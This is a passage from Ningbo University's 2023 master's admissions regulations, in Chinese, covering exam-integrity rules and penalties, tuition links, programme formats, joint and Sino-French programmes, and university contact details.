考生应自觉树立遵章守纪、诚实考试的意识。初试期间，考生应自觉遵守《全国硕士研究生招生考试考场规则》及各考点考场纪律；复试期间，考生应自觉遵守我校考场规则及考生所签署的《诚信复试承诺书》等内容，在我校复试工作结束前不得对外透露或传播复试试题内容等有关情况。

对在研究生考试招生中违反考试管理规定和考场纪律，影响考试公平、公正的考生，一律按《中华人民共和国教育法》及《国家教育考试违规处理办法》（教育部令第33号）严肃处理。对在校生，由其所在学校按有关规定给予处分，直至开除学籍；对在职考生，应通知考生所在单位，由考生所在单位视情节给予党纪或政纪处分；构成违法的,依法追究法律责任，其中构成犯罪的，依法追究刑事责任。

相关单位应将考生在硕士研究生招生考试中的违规或作弊事实记入《国家教育考试考生诚信档案》，并将考生的有关情况通报其所在学校或单位，记入考生人事档案，作为其今后升学和就业的重要参考依据。

十一、学费和奖助政策

2023年硕士研究生缴纳学费标准和奖助政策详见：http://graate.nbu.e.cn/zsgz/xxfw/xfyjz.htm。

十二、相关说明和其他注意事项

（一）非全日制硕士研究生仅招收在职定向就业人员。所有报考非全日制硕士的考生均须报考定向就业，否则视为不满足报名条件，不予参加考试。

（二）硕士专业学制为2.5-3年，各专业的具体学制，届时可查询我校研究生招生网上公布的招生专业目录。

（三）旅游管理（120203）（中法合作）项目，基本学制为3年（2年中国、1年法国），合格的毕业生可同时获得中、法双方颁发的学历和学位证书。

（四）全日制硕士研究生在学期间须全脱产学习。非全日制硕士研究生的学习方式一般采用集中（业余时间）面授与自学相结合，不脱产学习，在宁波大学相关校区授课，具体安排见相关学院网站的后续通知。

（五）海运学院、海洋学院、食品与药学学院和新药研究院位于宁波大学梅山校区。

（六）2023年我校与中国科学院宁波材料技术与工程研究所在机械、计算机技术、材料与化工专业开展联合培养研究生项目，详见招生目录中“科教融合学院”。

（七）2023年我校与宁波大学科技学院在机械工程、计算机技术专业开展联合培养研究生项目，详见招生目录中“科学技术学院”。

（八）2023年我校与兴义民族师范学院在中国语言文学、化学和教育硕士等学科专业开展联合培养硕士研究生。

（九）医学院现有“宁波大学与法国勃艮第弗朗什孔泰大学（UBFC）合作举办临床医学与生命科学博士研究生教育项目”，在临床医学专业（专业代码100200）下招生，项目简介详见：https://medicine.nbu.e.cn/info/1502/16250.htm。

（十）若发生考生与原单位因报考研究生所产生的问题而造成考生不能报名、考试、录取、就读的后果，由考生承担责任。

（十一）招生章程、专业目录、硕士生导师介绍、学院联系方式等信息，详见我校研究生招生网http://graate.nbu.e.cn/zsgz/zssy.htm。

（十二）考生应随时留意我校研究生招生网的相关通知，如有变动，以我校研究生招生网公布的相关信息为准。

（十三）本招生章程如与国家相关政策不符或国家调整招生政策的，以国家政策为准。

（十四）有关报考专业的具体问题，可直接与相关招生学院联系。

联系地址：浙江省宁波市江北区风华路818号 宁波大学研究生院

学校代码：11646

邮政编码：315211

电话：0574-87600226，87609136

网址： http://graate.nbu.e.cn